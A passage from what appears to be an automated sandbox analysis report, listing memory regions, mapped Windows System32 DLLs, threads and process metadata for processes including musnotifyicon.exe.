"c:\\windows\\system32\\mswsock.dll") Region: id = 4460 start_va = 0x7fffc9910000 end_va = 0x7fffc9924fff monitored = 0 entry_point = 0x7fffc9918620 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 4461 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4462 start_va = 0x7fffc9a90000 end_va = 0x7fffc9a9bfff monitored = 0 entry_point = 0x7fffc9a92200 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4463 start_va = 0x7fffc9ad0000 end_va = 0x7fffc9b29fff monitored = 0 entry_point = 0x7fffc9adb770 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4464 start_va = 0x7fffc9b80000 end_va = 0x7fffc9baafff monitored = 0 entry_point = 0x7fffc9b82db0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 4465 start_va = 0x7fffc9bb0000 end_va = 0x7fffc9beafff monitored = 0 entry_point = 0x7fffc9bb4000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 4466 start_va = 0x7fffc9bf0000 end_va = 0x7fffc9c16fff monitored = 0 entry_point = 0x7fffc9bf6200 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4467 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4468 start_va = 0x7fffc9f10000 end_va = 0x7fffc9f21fff monitored = 0 entry_point = 0x7fffc9f13e30 region_type = mapped_file name = "umpdc.dll" filename = "\\Windows\\System32\\umpdc.dll" (normalized: "c:\\windows\\system32\\umpdc.dll") Region: id = 4469 start_va = 0x7fffc9f30000 end_va = 0x7fffc9f7afff monitored = 0 entry_point = 0x7fffc9f33480 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4470 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4471 start_va = 0x7fffca060000 end_va = 0x7fffca090fff monitored = 0 entry_point = 0x7fffca06e380 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4472 start_va = 0x7fffca0b0000 end_va = 0x7fffca0cefff monitored = 0 entry_point = 0x7fffca0b8ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4473 start_va = 0x7fffca220000 end_va = 0x7fffca26cfff monitored = 0 entry_point = 0x7fffca233280 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4474 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4475 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 4476 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4477 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 4478 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4479 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 4480 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4481 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4482 start_va = 0x7fffcaa90000 end_va = 0x7fffcaba4fff monitored = 0 entry_point = 0x7fffcaaceb60 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4483 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4484 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4485 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4486 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4487 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4488 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4489 start_va = 0x7fffcb790000 end_va = 0x7fffcb798fff monitored = 0 entry_point = 0x7fffcb792020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4490 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4491 start_va = 0x7fffcb940000 end_va = 0x7fffcb96ffff monitored = 0 entry_point = 0x7fffcb9414d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4492 start_va = 0x7fffcb970000 end_va = 0x7fffcb9c4fff monitored = 0 entry_point = 0x7fffcb97a7e0 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4493 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4494 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4495 start_va = 0x7fffcbef0000 end_va = 0x7fffcc018fff monitored = 0 entry_point = 0x7fffcbf16140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4496 start_va = 0x7fffcc020000 end_va = 0x7fffcc08afff monitored = 0 entry_point = 0x7fffcc034300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4497 start_va = 0x7fffcc090000 end_va = 0x7fffcc7c0fff monitored = 0 entry_point = 0x7fffcc19e6e0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4498 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4499 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4500 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 367 os_tid = 0x740 Thread: id = 368 os_tid = 0x9f4 Thread: id = 369 os_tid = 0x9cc Thread: id = 370 os_tid = 0x934 Thread: id = 371 os_tid = 0x930 Thread: id = 372 os_tid = 0x8f4 Process: id = "19" image_name = "musnotifyicon.exe" filename = "c:\\windows\\system32\\musnotifyicon.exe" page_root = "0x76bec000" os_pid = "0x15e0" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x147c" cmd_line = "%systemroot%\\system32\\MusNotifyIcon.exe NotifyTrayIcon 13" cur_dir = "C:\\Windows\\system32\\" os_username = "PXTHFFRYO7\\OqXZRaykm" bitness = "32" os_groups = "PXTHFFRYO7\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001bd08" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4536 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4537 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4538 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4539 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4540 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 4541 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4542 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4543 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4544 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 4545 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 4546 start_va = 0x7ff704f50000 end_va = 0x7ff704fdbfff monitored = 0 entry_point = 0x7ff704f80520 region_type = mapped_file name = "musnotifyicon.exe" filename = "\\Windows\\System32\\MusNotifyIcon.exe" (normalized: "c:\\windows\\system32\\musnotifyicon.exe") Region: id = 4547 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4550 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 4551 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 4552 start_va = 0x400000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4553 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4554 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4555 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4556 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 4557 start_va = 0x100000 end_va = 0x1c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4558 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 4559 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4560 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4561 start_va = 0x550000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 4562 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4563 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4564 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4565 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4566 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4567 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4568 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4569 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 4570 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4571 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 4572 start_va = 0x7fffca500000 end_va = 0x7fffca55ffff monitored = 0 entry_point = 0x7fffca510380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 4573 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4574 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4575 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4576 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4577 start_va = 0x7fffc5ea0000 end_va = 0x7fffc5ed5fff monitored = 0 entry_point = 0x7fffc5eaf5a0 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 4578 start_va = 0x7fffba0f0000 end_va = 0x7fffba19efff monitored = 0 entry_point = 0x7fffba15f1c0 region_type = mapped_file name = "upshared.dll" filename = "\\Windows\\System32\\upshared.dll" (normalized: "c:\\windows\\system32\\upshared.dll") Region: id = 4579 start_va = 0x7fffbe610000 end_va = 0x7fffbe642fff monitored = 0 entry_point = 0x7fffbe62cfd0 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 4580 start_va = 0x7fffc7c60000 end_va = 0x7fffc7cfefff monitored = 0 entry_point = 0x7fffc7c89120 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4581 start_va = 0x7fffbfed0000 end_va = 0x7fffbffd1fff monitored = 0 entry_point = 0x7fffbff157d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4582 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4583 start_va = 0x7fffc92d0000 end_va = 0x7fffc9359fff monitored = 0 entry_point = 0x7fffc9315870 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 4584 start_va = 0x7fffc9270000 end_va = 0x7fffc9279fff monitored = 0 entry_point = 0x7fffc9271850 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 4585 start_va = 0x650000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 4586 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4587 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4588 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 4589 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 4590 start_va = 0x650000 end_va = 0x777fff monitored = 0 entry_point = 0x676140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4591 start_va = 0x780000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 4592 start_va = 0x490000 end_va = 0x497fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 4593 start_va = 0x4a0000 end_va = 0x4cdfff monitored = 0 entry_point = 0x4a14d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4594 start_va = 0x790000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 4595 start_va = 0x7fffcb940000 end_va = 0x7fffcb96ffff monitored = 0 entry_point = 0x7fffcb9414d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4596 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 4597 start_va = 0xb20000 end_va = 0x1f20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 4598 start_va = 0x4a0000 end_va = 0x4a1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "musnotifyicon.exe.mui" filename = "\\Windows\\System32\\en-US\\MusNotifyIcon.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\musnotifyicon.exe.mui") Region: id = 4599 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4600 start_va = 0x1f30000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 4601 start_va = 0x7fffca0b0000 end_va = 0x7fffca0cefff monitored = 0 entry_point = 0x7fffca0b8ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4602 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4603 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 4604 start_va = 0x4b0000 end_va = 0x4c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 4605 start_va = 0x4d0000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4606 start_va = 0x1f30000 end_va = 0x2074fff monitored = 0 entry_point = 0x1f8a9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4607 start_va = 0x20e0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 4608 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4609 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 4610 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4611 start_va = 0x660000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 4612 start_va = 0x1f30000 end_va = 0x2074fff monitored = 0 entry_point = 0x1f8a9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4613 start_va = 0x670000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 4614 start_va = 0x6f0000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 4615 start_va = 0x1f30000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 4616 start_va = 0x770000 end_va = 0x770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 4617 start_va = 0x1fb0000 end_va = 0x1fb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 4618 start_va = 0x7fffc3560000 end_va = 0x7fffc3585fff monitored = 0 entry_point = 0x7fffc356ab40 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 4780 start_va = 0x7fffbadd0000 end_va = 0x7fffbae0efff monitored = 0 entry_point = 0x7fffbadf7d00 region_type = mapped_file name = "wosc.dll" filename = "\\Windows\\System32\\wosc.dll" (normalized: "c:\\windows\\system32\\wosc.dll") Region: id = 4781 start_va = 0x7fffbe450000 end_va = 0x7fffbe534fff monitored = 0 entry_point = 0x7fffbe4dac50 region_type = mapped_file name = "flightsettings.dll" filename = "\\Windows\\System32\\FlightSettings.dll" (normalized: "c:\\windows\\system32\\flightsettings.dll") Region: id = 4782 start_va = 